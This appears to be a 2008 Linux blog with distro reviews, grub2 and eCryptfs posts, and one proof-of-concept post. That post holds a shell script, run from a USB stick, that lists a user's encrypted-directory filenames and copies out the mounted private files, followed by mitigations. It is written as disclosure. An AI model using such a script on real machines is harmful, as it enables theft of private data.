jump to navigation

OpenSUSE 11 22 November, 2008

Posted by aronzak in Distro Wars, Linux, Suse, Ubuntu.
Tags: , , , , , ,

Having been disappointed by Ubuntu 8.10, I moved on to Fedora. Absolute failure. Looked ok, couldn’t set up a network connection. Fro some reason, /bin and /sbin were not in root’s $PATH, so for a moment I was unable to run dhclient and ifconfig. Don’t have a clue why that was. Next, I tried the Red Hat admin GUIs. Why they are GUIs, escapes me. you have to type system-config-x, as there is stupidly system-install-packages and system-control-network, so no tab completion for you. This is exceptionally stupid, as the former is just the program pirut, and the latter is a form of system-config-network. Why there are two escapes me. On the plus side, the graphical installer (anaconda) was good, and the startup display is quite good. It also has a nice gdm setup that does away with usernames (you click on your icon then enter a password).

Next, up, OpenSUSE. This has a very nice version of the old installer, which, on newer hardware, actually runs decently. The installer is very clean with a green and silvery look. On the downside, however, it suffers from the same problems as before. Partitioning is a mess. Surprise surprise, I don’t want to wipe my disc. To get custom partitioning, you have to click on a drop box, then click on partitioning. It’s something most people would want to configure, yet is bundled with useless options in a hard to access location. No warning is given that it is going to format a disk, except for small red text, so noobs could easily just click through and not realise until it is too late that they are going to lose data. That one really should have been addressed by now. Also, even though I am installing from a DVD, it has a funny box that lists the installation media that are in use, along with a total. Looks a bit stupid. The install is extremely slow, compared to others.

Now I start to remember why I dislike Suse. First, it makes you except a EULA. I feel dirty whenever I have to do this. It also makes you accept one for Firefox, something that caused a furore in the Ubuntu crowd.

Next, it comes without nano. This is highly annoying as nano is my primary editor.

Thirdly, it bundles a desktop search called kerry beagle. This may be usefull for some users, but this really should be opt-in, rahter than a difficult opt-out. Somewhere, there should be an explicit option to enable or disable it. It caches the user’s home directory, as well as keeping all of firefox’s web history. Also, even in KDE 3.5, it bundles the stupid ugly menu, which Novell made. Though, it is easy to go back to the getter ‘classic’ menu.

Fourth, it gave me the hostname linux-th98. Whatever the hell that is. I don’t remember a choice. Ubuntu handles this by making the domain username-laptop or somehting, which works fairly well for some.

Fifth, yast blows. Yast2 (graphical) is a pain, and the non graphical one is really difficult to work with (Imagine a UI where instead of having a mouse, you press tab.) I wanted to eliminate the beagle group, but there is no groups settings that I found, other than user 1000. The Gnome settings dialogues are more useful. Flowing from this is that files such as fstab and menu.lst are expected to be edited in a stupid GUI (even though they’re text) and so there is no clean tab format.

So. All in all not too bad, as I can’t find too many things to complain about. Most of these are my personal preference. There are other things that have good defaults, like the screensaver and kdm theme. I’ll hang onto this one for a while if I can figure out how to blast beagle off the face of the Earth.

On the black machine, Suse wins. But generally, I would say that Ubuntu wins thus far for ordinary users. Of cource, Debian is the natural choice for those in the know.

Ubuntu Intrepid Ibex Dissapoints 17 November, 2008

Posted by aronzak in Debian, Distro Wars, Grub, Linux, Ubuntu.
Tags: , , , , ,
add a comment

Ubuntu has a long and sad history of disregarding the needs and wants of power users in their drive for ease for users who are unfamiliar with, and have little inclination to become familiar with Linux. To me, it’s dissapointing. More hardline flamers have become angry at Ubuntu and Canonical. This is my experience.

I have a cheap computer. An old one died, so I simply bought a few cheap components to replace the dead box, reusing some drives. The machine has integrated grpahics, because I haven’t coughed up for a real card yet. Vesa drivers work fine, but both the 2d nv and proprietary nvidia divers don’t work. Probably because the mbo only cost me ~70AUD. I’ve known about this since I’ve had the machine. I can’t be bothered to fix it, because I can use 3d apps on another machine.

Ubuntu Intrepid Ibex uses a new version of xorg. Supposedly, it has a very little configuration needed and can dun with no /etc/X11/xorg.conf. This sounds like a good idea. But, for me it means that there are problems.

After finishing the Debian installer, Ubuntu boots. No grub menu is shown, another pet peeve I have. If you do hit escape, you are confrinted with an ugly, black screen. Then you get usplash. Great for some. Then again, if you turn it off you get ugly readouts from a kernel with useless timing enabled. Ok, this is a problem in Debian too, but I compiled my own kernel. Then you get the same ugly gdm theme Ubuntu has been using since forever.

The problem is, gdm didn’t come up. Rather than dropping to a shell to let me diagnose this, there is an ugly black screen with low resolution. I try as few options, none of which work. To finish applying settings, I’m informed that the xserver will restart in one minute. Pressing ok leaves the screen pitch black. The Ubuntu developers must be fond of black.

Dropping to a shell lets me find that there is indeed an xorg.conf. Wonderful. startx works, after killing xinit. And he voila, gnome appears. In SVGA (800×600) resolution. Xrandr will only let me change this down to 640×480. Brilliant. Copying over Debian’s configuration file is no good. Somehow, the new xorg does not accept screen resolutions in the configuration file. Anyway, after trying the other trick I’ve heard of, I remove the file. This works wonders, and now, somehow, my screen size becomes 1024×768 when using startx. No such luck when starting, the xserver still refuses to start. My next move is to uninstall the nv driver. Good thinking, I hear you say. Well, now gdm will start. But somehow, my former trick doesn’t work, and I am stuck with SVGA. So what am I supposed to do? Reinstall a broken driver?

Forget it. I’m sticking with Debian. Debian has failed in interesting ways, but I have always been able to fix it. I don’t like xorg.conf, or for that matter grub’s menu.lst, or fstab. But I’ve just learned to get used to them. Sooner or later I’m going to man up and just use vim. Don’t get me wrong, making the user do less work is great. I like apt, and rarely compile anything from source. I’m not a sadist. But, I think that these ‘miracle’ fixes, like having no configuration files, are a dumb idea. Why? Because there are situations that no developer can foresee, and they will end up just not working. And what do you do then? You edit the configs. I’ve done things the hard way, and my Debian install has more or less worked ever since.

Proof of concept: Attacking eCrypt Private Directories 6 November, 2008

Posted by aronzak in Encryption, Linux, security, Ubuntu.
Tags: , , , , , , , ,

In the new version of Ubuntu, Intrepid Ibex, users have the option of setting up a private encrypted directory in their home folder. For convenience, this uses pam to mount it without the need to set and remember a password. This is convenient, and makes cryptography accessible to the non tech savvy, however, convenience is usually at the detriment of security, and this seems to be no exception.

Placing your files in an encrypted home directory can defeat attempts to access the files from other users and live users (with root privileges). It does, however, mark these files out as of interest. Additionally, while the files themselves are encrypted, the file names are not masked, and can be read by a user with sufficient privileges, possible giving an indication of the contents..

Thus, it is possible to simply copy the whole folder off the system if it is left open. That means that if an adversary manages to get physical access to your machine while you are logged in, (even when you are not logged in, if they have your password) they can quickly plug in a usb stick and execute the following script on it. The following is a proof of concept for an attack to copy off the list of file names of the private directory, and if mounted, steal the contents.

# eCrypt Proof of Concept
# Version 0.9 beta
# Aronzak (aronzak.wordpress.com)

echo "Aronzak's eCrypt attack Proof of Concept Beta"

date=`date +%F`

mkdir -p $dir/attack/
mkdir -p $dir/attack/manifest
echo "Username:" > $dir/attack/manifest/$date
echo $user >> $dir/attack/manifest/$date
echo "Manifest:" >> $dir/attack/manifest/$date

echo -n "Taking manifest: "
echo $dir/attack/manifest/$date
find ~/.Private >> $dir/attack/manifest/$date

echo -n "Checking if directory is mounted: "

check=`ls -l ~/Private| grep -c "THIS DIRECTORY HAS BEEN UNMOUNTED TO PROTECT YOUR DATA --  Run mount.ecryptfs_private to mount again -> /sbin/mount.ecryptfs_private"`

if [ $check = "1" ]; then
	echo "Foiled once more!"
	echo "Directory was not mounted." >> $dir/attack/manifest/$date
if [ $check = "0" ]; then
	echo "Victory is assured!"
	echo -n "Calculating size of directory: "
	du -hs ~/Private >> $dir/attack/manifest/$date
	size=`cat $dir/attack/manifest/$date | tail -n 1 | cut -f 1`
	echo $size
	gsize=`cat $dir/attack/manifest/$date | tail -n 1 | cut -f 1 | grep -c G`
	if [ $gsize = "1" ]; then
		echo "Warning: This is larger than a gigabyte."
	echo "Press Ctrl+C to abort: "
	read -s input
	echo -n "Copying: "
	mkdir -p $dir/attack/$date/
	cp -r ~/Private $dir/attack/$date/
	echo "Done"

And this is the expected output if not mounted:

Aronzak's eCrypt attack Proof of Concept Beta
Taking manifest: /home/aronzak/attack/manifest/2008-11-06
Checking if directory is mounted: Foiled once more!

And if mounted:

Taking manifest: /home/aronzak/attack/manifest/2008-11-06
Checking if directory is mounted: Victory is assured!
Calculating size of directory: *****(omitted)
Press Ctrl+C to abort:
Copying: Done

So, this should be able to copy files from one user’s home directory straight to a usb stick. A warning will be given if the files are over one gigabyte.

There are two precautions to avoid this. One is to create ‘junk’ files that take up more than a gigabyte of space. That will make it harder to copy the contents to a usb stick, as it will make it slower, and many usb sticks will not have the space.

The other is to set up eCrypt to use a real password (rather than using a generated one with pam) or upgrade to a stronger system, like truecrypt. It seems that the time honoured approach difficulty of choosing, remembering and typing a sufficiently complicated password pays off when it comes to the security benefit. Also, this gives you access to your files regardless of OS.

Finally, if you are someone that has or intends to write a guide about how to set up eCryptfs-tools, please make it clear that the system is not fully secure.

Encrypted home directory 2 November, 2008

Posted by aronzak in Encryption, Linux, Ubuntu.
Tags: , , , , , ,
1 comment so far

By default all users can see all of you’re home directory contents. There’s a new utility that’s bundled with Ubuntu Intrepid called ecryptfs that can create a private directory. Bear in mind that this is by no means perfect, Here’s how to use it.

apt-get install ecryptfs-utils



You’ll need to provide your user password and a password to remember, I recommend against using a generated password (unless you write it down… )

Each time you mount your directory, you’ll need to add the key. Warning; One of the ways to do this is extremely insecure(secuina):

ecryptfs-add-passphrase ‘x’

Where x is your passphrase. This puts the passphrase in the process IDs, where someone else can read id. Another way;

printf ‘x’ | ecryptfs-add-passphrase

is also insecure, as it will save the passphrase in your bash history. The safest way is to pass a ‘-‘;

ecryptfs-add-passphrase –

Then you can enter your password on the next line (without it being recorded in .bash_history)

Once your passphrase is entered, use ecryptfs-mount-private

Be careful, this is not as secure as you may think. Some more warnings and mitigations;

– All of the filenames of the private directory are readable in ~/.Private even when it is not mounted. File permissions make the directory only readible to the user, but someone could get access whenever the user is logged in. If an adversary has your password, even if you lock your graphical server, they could log in to a shell (Ctrl+Alt+F<1-6>) or a secure shell (ssh) (if you are running an ssh server) and read the contents of the private directory. They could also use a live session (CD/DVD/usb stick) Thus, someone may be able to guess what is in your private directory.

– Putting files in an encrypted directory immediately marks them out as of interest. I suggest leaving ‘junk’ files that you wouldn’t mind an adversary finding (plausible deniability) and maybe some largeish files (to make it harder to quickly copy out the entire directory)

– If you leave the private folder mounted, an adversary could get access with your user password, without your encryption passphrase. Be careful if you are running a secure shell (ssh) server. Bear in mind that even if you lock your graphical server, someone could log in to a shell (Ctrl+Alt+F<1-6>) and then get access to your files.

– Using ecryptfs-umount-private to unmount the private directory still leaves the password stored.

I’d be happy to hear other workarounds for some of these issues.

Dell takes Ubuntu seriously 14 October, 2008

Posted by aronzak in Dell, Linux, Netbooks, Ubuntu.
Tags: , , , , ,

The VAR guy has an article showing an advertisement for the Dell inspiron mini 9 featuring Ubuntu, with no mention of a Windows model. Well done Dell. But I was more surprised when I saw this page.

Ubuntu is not hidden. In fact, it says ‘Ubuntu’ 4 times, and gives an opetion to build each of the XP machines with Ubuntu. Dell must be confident.

Stay Away From Grub2 30 September, 2008

Posted by aronzak in Debian, Grub, Linux, Ubuntu.
Tags: , , , , , , ,

I strongly recommend that you don’t try upgrading to grub2, and developers don’t implement it in new releases. I have a multiboot setup like most users, and bad things happened to me.

Having read about ‘new features’ in the next version of the GNU Grand Unified Bootloader, grub2, I decided to upgrade.

At first, the grub2 installer kept grub ‘legacy’, which could chainload into grub2, with the first entry in grub being:

title        Chainload into GRUB 2
root        (hd0,2)
kernel        /boot/grub/core.img

Unfortunately, I then removed grub legacy, replacing it entirely with grub2.  This left me booting into a screen with only Debian entries. This is no good; I have other distros on my laptop, like most users would have other OSes such as Windows.

So, next, I decide to edit the configuration file. I am used to editing menu.lst. Grub2 does not use menu.lst, it uses a file called grub.cfg (easy to confuse with grub.conf, which in my CentOS install menu.lst is a link to).

Let me digress and talk about the differences between grub.cfg and menu.lst.

Here’s menu.lst; with a familiar header:

# menu.lst - See: grub(8), info grub, update-grub(8)
#            grub-install(8), grub-floppy(8),
#            grub-md5-crypt, /usr/share/doc/grub
#            and /usr/share/doc/grub-doc/.

As well as being full of comments that help users to understand and edit the file, as well as ‘examples’ of Linux and Windows entries. Then there are the entries themselves, using a familiar, clean tabbed format that is default in Debian.

title        Debian GNU/Linux, kernel 2.6.26-1-686
root        (hd0,2)
kernel        /boot/vmlinuz-2.6.26-1-686 root=/dev/sda3 ro
initrd        /boot/initrd.img-2.6.26-1-686

title           Ubuntu /dev/sda1
root            (hd0,0)
kernel          /vmlinuz root=/dev/sda1
initrd          /initrd.img

As well, I have a list of kernels that Ubuntu populated using update-grub, and that can be loaded using ‘configfile’

title        >Ubuntu List
root        (hd0,0)
configfile    /boot/grub/menu.lst

But to edit grub.cfg, first we get this friendly welcome:


Then we get these nice, easy, simpler list entries:

menuentry "Debian GNU/Linux, linux 2.6.26-1-686" {
linux    /boot/vmlinuz-2.6.26-1-686 root=UUID=124b49d6-a3eb-4eae-9e5d-e0000b5efda3 ro
initrd    /boot/initrd.img-2.6.26-1-686

The problem is, they aren’t. After users have struggled for a long time to edit menu.lst in order to make their computers boot properly, they will now need to learn a complicated, obscure format. It seems difficult if not impossible to convert boot entries in menu.lst files to grub.cfg files, with time being wasted adding unnecessary brackets and quotes, whereas they were not needed before.

Back to what happened. So, wanting to add in an Ubuntu entry I take menu.lst, and use find and replace to change ‘title’ to ‘menuentry’, ‘root’ to ‘set root=’ and ‘kernel’ to ‘linux’. Makes perfect sense. So I enter the following entry based on menu.lst

menuentry    "Ubuntu /dev/sda1" {
linux              /vmlinuz root=/dev/sda1
initrd          /initrd.img

The problem is, after ignoring  the ominous “DO NOT EDIT THIS FILE”, grub2 then refused to boot anything, throwing up an error that I need to boot the kernel first. Before what?  Luckily, I had a version of grub legacy on my usb stick, and only wasted about 10 minutes installing grub back onto the hard disk. Now my laptop works fine, and is able to boot into Ubuntu, Debian and CentOS.

I have a feeling that this problem arises with the difference in partitions, since grub2 seems to use variables that remain set for a section, rather than having a ‘root’ line in each entry. This probably makes sense in some applications. It sounds like a good idea for USB sticks, where the stick will change position in relation to other disks on different computers (but the UUID won’t change). If you want to edit your grub.cfg, probably edit the ‘custom’ section, rather than adding an entry in the ‘linux’ section

So, for me grub2 could only boot up Debian or nothing at all. There is very little documentation on how to edit the confusing grub.cfg, compared to menu.lst, where there is much community support. Whatever the benefits of grub2 are, I don’t think that they are worth the damage it could cause. Developers should steer clear of using the code, as it will only mean grief for the end user.

Black Meets White; Virtualbox in Ubuntu Intrepid 28 August, 2008

Posted by aronzak in Linux, Ubuntu, Virtualbox, Virtualisation, Windows, Windows 2000.
Tags: , , ,
1 comment so far

I installed an alpha of Ubuntu Intrepid Ibex (8.10) just now. Virtualbox is an application developed by Sun that has a free and open source version. Virtualisation software can be used to run a full windows environment to run those annoying apps that have bugs, or just won’t work in wine. (Wine has come a long way, but it’s still not really there.) The best feature of virtualbox, something beating commercial products is the ability to run in “integrated mode”. After installing, simply press Hostkey(Right Ctrl by default) and L. Voila.

Near full wipe, reinstall 6 August, 2008

Posted by aronzak in Debian, Linux, Suse, Ubuntu, Windows.
Tags: , , , , , ,
add a comment

Well, I have to say that I respect what this guy has to say. But I am a little offended at the notion that you need windows to come in and save you when things go wrong. Anyway, with the power of suse, I completely removed the extended partition, and repartitioned with four primary ext3 partitions. A new extended partiton houses only one swap partition. No need for windows here. One other good thing; Suse seems to be able to suspend to disc just fine.

Bad helpdesking 3 August, 2008

Posted by aronzak in Linux, Ubuntu.
Tags: ,
add a comment

There’s an interesting story on Slashdot: a Verizon customer called Libershitz tried to upgrade his internet from dialup to DSL, but was denied because his last name contained an expletive. Managers actually had the tenacity to suggest that the veteran change his last name, jsut to suit their interests. Talk about pigheadedness.

This brings me to Foxconn. They have learnt their lesson and run with their tail between their legs and quickly made a patch for the BIOS. The Chinese employee from foxconn making this post has effectively apologised for the mistake and promised that it would not happen again. But really, the way that they originally handled it was shocking. Listen to this:

“Dear Ryan:

Do you get the same beep codes if you were to remove all RAM out and then turn the system ON again?”

Response: “No, because then I wouldn’t be able to boot into Linux, suspend to RAM, to get the ACPI failure, have syslogd pollute my /var/log/messages file with it, or read about it in my system log.”

What a moron this Dan is. Foxconn will continue to cop a lot of slack for this serious blunder.

Are there really too many distros? 29 July, 2008

Posted by aronzak in Distro Wars, Linux, Ubuntu.
Tags: , , ,
1 comment so far

Many people seem to be saying it of late; that there are too many Linux distributions (distros), and that the choice is too hard for new users. While it may be hard to choose for some new users (without the help of a friend, a guide or common sense in some instances), I disagree with the argument that there are too many distros. A few points on the matter:

1 Major distributions control most of the market

Have a look at this:

As you can see, as a percentage of people using linux on the desktop, 30 % use Ubuntu (including major derivatives), and 20 % Suse. That means that all of those countless others are ‘competing’ for only 50% of the market. If we say that there are 500 distros, then 498 are crammed into 50%. Also Red hat, Fedora and Gentoo chomp up another 15%. That means that roughly less than a third of regular, day to day Linux installs are of not mainstream distros, leaving roughly 495 distros to fight it out over 35%. See where this is going?

2 Minor distros

Unfortunately sites like distrowatch tend to include distros that two men and a dog use in their full lists. Many are worked on only as a hobby or project by a maintainer, and they are only ever small and die out when people lose interest. They do not really intend to have users new to the Linux operating system use them, so the idea that theri existence turns people away I don’t buy.

3 Specialised distros

Don’t get me wrong; a huge number of distros are doing really great work catering for a specific need or use (small, live, etc…) This is another fact commonly overlooked, with many believing that all distros are ‘competing’ for the same market. If you download Asianux, don’t be durprised that the default language isn’t English. Same goes for Spanish and Portugeese distros. Many distros are specialised for some puprose or another. If you are an ordinary user, you are not interested in versions for government or hospital use. That rules some out.

4 Distros run in the family

This may seem a minor point to those that don’t get it, but distros branch out from families, usually using the same package management system. Different methods of software installation work different ways. Therefore, we need to have different families. Also it is worth recognising that some customisations of some major distros are not that significant, and are not really distros in their own right.

5 News hyperbole

There is a perception that all distros are significantly different. All distros talk themselves up, and tech news writers tend to use hyperbole when they report on new releases, suggesting that each new release is somehow radical and completely different to the last. This may make a story sound exciting, but usually the biggest change that users will notice between releases is the default desktop.

6 Linux is not a company

Many people have suggested that Linus exert control over distros to amke them all merge into one. This fundamentally assumes that Linux and the open source community operates in the same way as other software producers to create a product. Linux, however, is not a company selling a product. There are companies involved, that talk up their own products, but there is no central “Linux” PR organisation. Linus is there to develop a kernel, not to try and make Linux’s use widespread.

7 Too many desktops?

Some have suggested that choosing a desktop is complicated. Firstly, there is not a great choice between mainstream desktops. Choose one of three. Next, if you feel like something different, it’s easy to install another desktop. They’re all the same (more or less). The differences are hyped up, with the different ‘camps’ zealously defending their product. (you should see some of the arguments between gnome and KDE, they’re really vicious over nothing) In reality, all are pretty much just as easy to use, except for minimal environments (icewm, fluxbox etc…)

Next I’ll write about how to go about choosing a distro.